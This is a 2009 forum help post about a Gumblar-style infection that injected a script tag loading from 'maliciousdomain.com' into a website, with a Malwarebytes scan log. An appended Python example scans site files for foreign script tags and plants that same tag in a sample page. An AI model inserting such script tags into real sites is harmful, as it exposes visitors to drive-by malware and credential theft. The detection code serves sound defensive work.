Help, Malware Bytes Closes - Javascript injected into my website



#1 infoworld


Posted 16 November 2009 - 07:58 PM

Sadly, I think I am infected -- even though I'm running NOD32 Antivirus. On Saturday, I visited my 3-year-old website and I was greeted by a big warning message (courtesy of Google). The message warned me that my site was dangerous ("This site may harm your computer."). After contacting my webhost, it seems something has injected a malicious script inside the HTML/PHP pages on my website. The injected code looked like this:

script src=http://maliciousdomain.com/libraries/CREDITS.php> **end script tag**
Basically, someone was trying to inject Javascript links into my pages.

My webhost believes this is a "Gumblar" attack. http://blog.unmaskparasites.com/2009/10/23...umblar-zombies/ Usually this virus spreads when you visit a site that is already infected - the Javascript on that site automatically installs some malicious virus/backdoor onto your machine to steal your FTP details, and then with these details, the code is injected onto your site. All unauthorized/rogue code has been removed from my website, and I want to clean up my laptop before creating new FTP login details, updating Wordpress passwords, db user passwords, etc. I downloaded Malwarebytes and ran a scan. Here is the output of the scan:

Scan type: Full Scan (C:\|)
Objects scanned: 152988
Time elapsed: 20 minute(s), 15 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 2

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\dllcache\user32.dll (Virus.Mariofev) -> No action taken.
C:\WINDOWS\system32\~.exe (Backdoor.Bot) -> No action taken.

It seems there are 2 infected files -- both inside my system32 directory. After the report printed, Malwarebytes closed. Each time I attempt to open Malwarebytes (to delete the viruses), it closes automatically. Malwarebytes doesn't stay open. How do I remove the 2 infected files above?

Edited by infoworld, 16 November 2009 - 08:00 PM.
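
Added example, not part of the original post: one way to confirm that a local copy of a site is free of the kind of injected script tag described above is to list every `<script src=...>` in the HTML/PHP pages that loads from a host the site owner does not expect. The function names, the allowlisted host `cdn.example.org` and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# <script ... src=URL>, with the URL double-quoted, single-quoted or unquoted.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE,
)
PAGE_SUFFIXES = {".html", ".htm", ".php"}

def foreign_scripts(text, allowed_hosts):
    """Return (line, url) for each script tag loaded from a host not allowed."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        url = next(g for g in m.groups() if g is not None)
        host = urlparse(url).hostname  # None for relative (same-site) paths
        if host and host.lower() not in allowed_hosts:
            hits.append((text.count("\n", 0, m.start()) + 1, url))
    return hits

def scan_webroot(root, allowed_hosts):
    """Walk a local copy of the site and map relative path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PAGE_SUFFIXES:
            hits = foreign_scripts(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Constructed sample site: one clean page, one with an appended script tag."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(
            '<html>\n<script src="/js/menu.js"></script>\n'
            "<script src='https://cdn.example.org/lib.js'></script>\n</html>\n"
        )
        Path(root, "blog").mkdir()
        Path(root, "blog", "post.html").write_text(
            "<html>\n<body>hello</body>\n</html>\n"
            "<script src=http://maliciousdomain.com/libraries/CREDITS.php></script>\n"
        )
        return scan_webroot(root, allowed_hosts={"cdn.example.org"})

if __name__ == "__main__":
    for page, hits in demo().items():
        print(page, hits)
```

Running the same scan again after the FTP, WordPress and database passwords have been changed shows whether the tags come back.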

